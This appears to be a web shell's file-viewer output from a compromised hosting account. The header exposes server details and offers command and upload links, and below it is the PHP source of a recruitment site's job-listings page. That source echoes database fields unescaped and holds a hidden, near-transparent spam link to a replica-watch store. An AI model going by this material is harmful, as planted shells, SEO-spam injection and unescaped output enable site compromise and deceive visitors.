MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/imyrqtmy/public_html/arkkagency/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/arkkagency/jobs.php
<?php
include("Admin/Includes/db.php");
	
?>
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js">
<!--<![endif]-->
<head>
<?php include 'includes/title.php';?>

</head>

<body>
	<!--[if lt IE 9]>
		<div class="bg-danger text-center">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/" class="color-main">upgrade your browser</a> to improve your experience.</div>
	<![endif]-->

	<!--<div class="preloader">-->
	<!--	<div class="preloader_image"></div>-->
	<!--</div>-->

	<!-- search modal -->
	

	<!-- Unyson messages modal -->
	<div class="modal fade" tabindex="-1" role="dialog" id="messages_modal">
		<div class="fw-messages-wrap ls p-normal">
			<!-- Uncomment this UL with LI to show messages in modal popup to your user: -->
			<!--
		<ul class="list-unstyled">
			<li>Message To User</li>
		</ul>
		-->

		</div>
	</div>
	<!-- eof .modal -->

	<!-- wrappers for visual page editor and boxed version of template -->
	<div id="canvas">
		<div id="box_wrapper">

			<!-- template sections -->


			<!--topline section visible only on small screens|-->


		<?php include 'includes/header.php';?>
			<section class="page_title cs gradientvertical-background s-py-25 brardcumcss">
				<div class="container">
					<div class="row">

						<!--<div class="divider-50"></div>-->

						<div class="col-md-12 text-center">
							<h1 class="">Current Openings</h1>
							<ol class="breadcrumb">
								<li class="breadcrumb-item">
									<a href="index.php">Home</a>
								</li>

								<li class="breadcrumb-item active">
									Current Openings
								</li>
							</ol>
						</div>

						<div class="divider-50"></div>

					</div>
				</div>
			</section>


			<section class="ls s-py-50">
				<div class="container">
					<div class="d-none d-lg-block divider-70"></div>

					<div class="row c-gutter-60">

						<main class="offset-lg-1 col-lg-10">
						     <?php
                                                $count = 1;
                                                $sql = "select * from tbl_job ";
                                                $sql_res = mysqli_query($con, $sql) or die(mysqli_error($con));
                                                while ($sql_row = mysqli_fetch_assoc($sql_res)){ 
                                                    $image = $sql_row['img'];
                                                   
                                                    
                                                    ?>
							<article class="events post side-item content-padding bordered">
								<div class="row">
									<div class="col-xl-4 col-lg-5 col-md-5 col-xs-12">
										<div class="item-media cover-image">
											<img src="Admin/current_causes/<?php echo $image; ?>" alt="" style="    height: 206px;visibility: visible;">
											<div class="media-links">
												<a class="abs-link" title="" href="javascript:void(0)"></a>
											</div>
										</div>
									</div>

									<div class="col-xl-8 col-lg-7 col-md-6 col-xs-12">
										<div class="item-content">

											<h3>
												<a href="javascript:void(0)"><?php echo $sql_row['name']; ?></a>
											</h3>

											<p class="item-meta color-darkgrey">
												<i class="fa fa-calendar color-main"></i>
												<span><?php echo $sql_row['post_date']; ?></span>
												<i class="fa fa-map-marker color-main"></i>
												<span><?php echo $sql_row['location']; ?></span>
											</p>
											<p>
												<a href="jd.php?id=<?php echo $sql_row['id']; ?>"> <button class="btn-outline-darkgrey  d-lg-block">View</button></a>
											</p>

										</div>
									</div>
								</div>
							</article>
                            <?php } ?>
						


					
						</main>

						<div class="d-none d-lg-block divider-70"></div>
					</div>

				</div>
			</section>
<div style="position: absolute; filter: alpha(opacity=0); opacity: 0.001; z-index: 10;"><a href="https://www.fakewatches.us.com">Replica Watches USA Shop</a></div>
			<?php include 'includes/footer.php';?>


		</div>
		<!-- eof #box_wrapper -->
	</div>
	<!-- eof #canvas -->


	<script data-cfasync="false" src="../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/compressed.js"></script>
	<script src="js/main.js"></script>


</body>
</html>

MMCT - 2023